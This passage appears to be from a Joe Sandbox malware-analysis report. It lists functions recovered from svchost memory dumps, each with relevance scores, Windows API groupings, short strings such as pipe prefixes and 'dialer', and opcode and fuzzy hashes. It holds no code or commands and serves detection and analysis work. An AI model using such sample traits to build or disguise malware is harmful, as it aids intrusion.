                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 03f29b56315fbdb1e2c5d3331ac812390df4fb0cbb8384e9f5da931591f2930e
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: 9D31A232292E82E1EE219B62A4007F523D4B748BE0F5E6675DD2E0B7D0EF39C5858310
                                                                          Function 000001F28C943DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 67fdd3f2f8992466b5831d267c2879e71773b428b435bf4b694825e767cf1671
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 69115B71250E82C6E7508B52E8547B966E0F788FE5F448264EA5E87794DB38C9148740
                                                                          Function 000001F28C933790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 9fd3b5cfc8d5e8966b9d3604d7804b60c4d561f4ad314e44b91f313a0dd5a99b
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: BB112A7A745B82C2EB149B22E4082B962A0F748BD5F4841B9DE8D07B54EF3DC545C704
                                                                          Function 000001F28C932F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: b9cea8a45f337747782123fe34ee0897264f1dc14d1d7790dfee48e93a4f475a
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: FF316C36781F96C2EA55DF26E9407BA67E0FB48BC4F089174DE4847B66EF38C4A18700
                                                                          Function 000001F28C93CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: 418adbff46a5a50f38b0b253e874f0d0017697ca07832169e1c80a98fc2d9935
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: A8119D31394EC2C2FA24A73169557FA22D66B88BF4F1863B4E836477DAEF3984018600
                                                                          Function 000001F28C93199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 1a6447b746ba72951b106e25e3206bcaab34f772bbf3986eefe84e7ef40a23b2
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 5A012D71344E8282EB64DB62A4587B963E5F788BC5F488075DE4983765DF3CC549C740
                                                                          Function 000001F28C9336C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: efc9dd88066c2b846a4813f200c66da5525754cb4ea5464905f9a4518e267477
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 690129B5291F82C2FB249B22E8183B963E0BB49BC6F0844B8CD4E07765EF3DC1488700
                                                                          Function 000001F28C938FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: f9eb285e1d34bcdb7ed76620ca0307c61ee7c6b0458fb15f7398ffc743cad808
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: A451DF32345A828AEB14CF65E848BB977E6F344BC8F1A91B4DE0653788DB75CA81C700
                                                                          Function 000001F28C931A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: efef17bbaea8c09d0e74b7a2858e95e013f6fcdb200dc7db2845cff4b926692d
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 71F04F72344EC292EB608F21F8847B967A1F748BC9F889070DA4987964DF3CC68DCB00
                                                                          Function 000001F28C933044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 148976000f075657713aaae28a70d927c58dd9bf1c24965bf8e6e3b71b7eca3c
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: CBF01275754FC682EA148B53B9141B966A6BB48FD0F08D1B4EE5A47B18DF3CC4458700
                                                                          Function 000001F28C93BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: fc48c038c58eca095657e722b28af341116bf169d467f81dd0427d00468570f8
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 90F090B1351F8681EB208B29E8443F963A1FB89BE1F5456B9CA6A472E4DF3CC048C340
                                                                          Function 000001F28C9350D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: 695498e749fc0dccb61c5851ea1446fca79afe24a4ea5175a6ebc953a781018c
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: FE02B536259BC586EB60CB65E4943BAB7E1F3C8794F145065FA8E87BA8DB7CC444CB00
                                                                          Function 000001F28C1E3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: a4a41e1020a2a8b071d84c40f44e8a003d1d22f86d765e777ed5b7e6a37d2a97
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 101191B2AD0F1391FA641528E4C13F91BC16F593F4FC88639E966C73D68BB4C841C200
                                                                          Function 000001F28C944104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 18dd3864b1be54540109cc27050939df0162b2e3d2136eb0ccd191d63ff6d6f5
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 4B117032AD0ED3A2F6685568E8563F911C16B7C3F8F18C6F4E976077E6CB38CA416201
                                                                          Function 000001F28C939650 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                          • Instruction ID: 7bb4e64f612b34c83592e40eb8d5e89f9ecd63dea6d765824e11e06b7d663cc9
                                                                          • Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                          • Instruction Fuzzy Hash: 26116030786EC382FF549735A8843F922D5AB487E4F0D66B4D926077D9EB38C841C700
                                                                          Function 000001F28C1DF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 8ad1ea8264d7c37166e6a84d5d136f736317519dcbce977c15a2e7b39df90729
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 1B61C1766A0E4242FA699B69E5C43FE6EE1E7867C0F544539DB0B077A4DB34FA42C300
                                                                          Function 000001F28C93AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: f049bdfa4467cedf291596ae25218e3f591c75243dbf1769f2e4c86082fcfec4
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: F8614737601A858AEB209FA5D8803FD77E1F344B98F089265EE4A57B99DB38C595C700
                                                                          Function 000001F28C1DA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 25aad5721677bc98cafa89319ea8e24db697cc3f84d272024727a276e12cc536
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: B5515C32180A82CEEB64CB2695843A97FE1F355BD4F18C226DB9987BD5CF38E491C701
                                                                          Function 000001F28C93AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 9177f0bf0d9df7804a9a46984ee0add15a62b848f9b6fecfe92ace9b6ae30fc5
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 2B518F72140AC28AEB748BB59D843B977E0F354BE5F1CA265DA5947BD5CF38D860CB00
                                                                          Function 000001F28C1D8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: afc53225cc655b2fed49d42925427f3b528b099016d9c220d28cc2c64652b1ec
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 1D51AB32661A02CAFB18DB15E484BB93BE5F354BDCF518134DB1643B88EB78E841CB84
                                                                          Function 000001F28C1D83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 5bb8fd39fd54a1bbbe4b45dd7fca3805f069a24c38516c4c1dc5b630a5076e57
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: C431BC72251B42D6F714DF12E884BA97BE8F740BC8F458124EF9A43B88DB38E941C784
                                                                          Function 000001F28C942058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: c39e5784b660c4a4d2f64d18794380c2bf08d3c743fbeb2aeb89f9dd3d7ee852
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: E0D19A72B54E818AE711CBA9D4402FC7BF1F358BD8F1482A6DE5997B99DB34C506C340
                                                                          Function 000001F28C9314A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 6a44d1e2dfff894d57fae1d393df2fad9fd7c7e601c52ccba1ddab5a2a16cdc8
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 90014476640ED1DAE704EF66E9082AAA7E0F78CFC1F088435EA4A43729EF38C151C740
                                                                          Function 000001F28C942980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: fc060a2a777751a54c3aac3ae4014f4932e9590c1f0470bfe82fe847ff4173f9
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: DD91CE72B50ED289FB64DF6594903FD3BE0B745BC8F1481A9DE0AA7A95DB34C482C700
                                                                          Function 000001F28C937960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: 96732df7916216e4dd4de8696d19f0f646e57f72df42aa736ed25244752b7042
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: B0111872790F428AEB008B70E8543B833A4F719798F441E35DA6D477A4EB78D2988380
                                                                          Function 000001F28C93253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: a81e46be2f1358104ca60f674bf27db7b8eb3ba3bc6c3102e371a9ccd66cc1d5
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 1B719F36280FC286EB259F36A8483FA67D4F389BC4F582076DD0A53B9ADF35D6458700
                                                                          Function 000001F28C1D9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: ae7e25292b4b5205da875e4987803c657081cd892f163ddae90b46efd944a166
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: 7E613432A01B868AEB20DF69D4803ED7BA0F748BD8F144225EF4917B99DB78E595C740
                                                                          Function 000001F28C9426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 2514762f6e10ab6845feae25dddec55dde5b08df4a5e13f98591cf2ab0d60153
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 60418D72615E8186EB209F25E8443FAB7A0F798BD4F548171EE4E87798EB3CC541CB50
